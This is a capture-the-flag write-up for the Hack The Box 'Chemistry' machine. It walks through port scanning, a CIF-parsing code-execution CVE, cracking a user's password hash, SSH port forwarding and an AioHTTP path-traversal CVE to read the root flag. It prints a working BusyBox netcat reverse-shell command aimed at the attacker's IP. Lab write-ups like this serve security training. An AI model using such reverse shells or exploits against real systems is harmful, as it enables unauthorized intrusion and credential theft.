Easy
Chemistry [20 pts]
| Challenge Description |
| Points: 20 |
| Solves: 10950 |
- exploiting a CIF processing library CVE reveals configuration files with a username and hash
- cracking the hash grants access, leading to discovery of a hidden HTTP server on port 8080
- exploiting an outdated AioHTTP library via a CVE allows reading the root flag
Enumeration
We start with nmap scan of the box. From the output we can see that there are 2 ports open, SSH (22) and port 5000, which responds with HTTP, so we can assume that it’s a web server.
kali@kali:~/HTB/chemistry $ nmap -sC -sV -oA nmap/chemistry 10.10.11.38
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.3 Python/3.9.5
| Date: Sun, 12 Jan 2025 21:21:30 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 719
...
HTTP server
After visiting the server we can see options to register and log in with not much else. Let’s try to create an account and log into it.
After the registration we end up on the home page of the website. It’s main purpose is to read CIF and analyze CIF files. We are provided with an example, which we can upload on the site to view it.
As per usual with easy challenges, the main goal is to try and find a CVE linked to processing of CIF files. This repository on github provides a PoC of arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string. When interacting with the server I noticed that the responses were created by Werkzeug, so there is a high chance that the server also uses this python library. After uploading the payload we need to view it in the div below the form. At first, I tried to upload reverse shell but I could not get it to work. However, I was able to at least receive a connection with payload nc 10.10.16.22 to confirm that the CVE is working. After trying out many possible reverse shells with revshell I managed to get the BusyBox reverse shell going, which got me the user flag. The reverse shell is busybox nc 10.10.16.22 9000 -e /bin/sh.
Foothold to user
After gaining access to the box through the application we need to get credentials for the user. We can find MyS3cretCh3mistry4PP located in the app.py in the current directory, however this did not work for the user rosa in the box. After a little bit of searching we can find another configuration file instance/database.db, which contains the value rosa63ed86ee9f624c7b14f1d4f43dc251a5. We can assume that this (63ed86ee9f624c7b14f1d4f43dc251a5) is the password for the user. We can check crackstation and see that the hash belongs to the password unicorniosrosados.
Privilege escalation
Enumerating running processes on the system returns unusual process running under root: /usr/bin/python3.9 /opt/monitoring_site/app.pp. We can also enumerate listening TCP ports and we find one port which probably matches the running process:
kali@kali:~/HTB/chemistry $ ss -at
State Recv-Q Send-Q Local Address:Port Peer Address:Port
...
LISTEN 0 128 127.0.0.1:http-alt 0.0.0.0:*
...
Let’s forward the port so we can look at it from our browser (inside my machine, run):
ssh -L 8000:localhost:8080 rosa@chemistry.htb
Now visiting http://localhost:8000 forwards us into the local server hosted at the box. It contains a website for monitoring services.
I looked around but nothing was really interesting, so I ran WhatWeb and found out that the site is using AioHTTP library with version 3.9.1, which is susceptible to yet another CVE. After tweaking it around a little bit - changing IP address and static folder to /assets/ (which I know where the script to list services is), we can use the exploit to read arbitrary files, and get the root flag.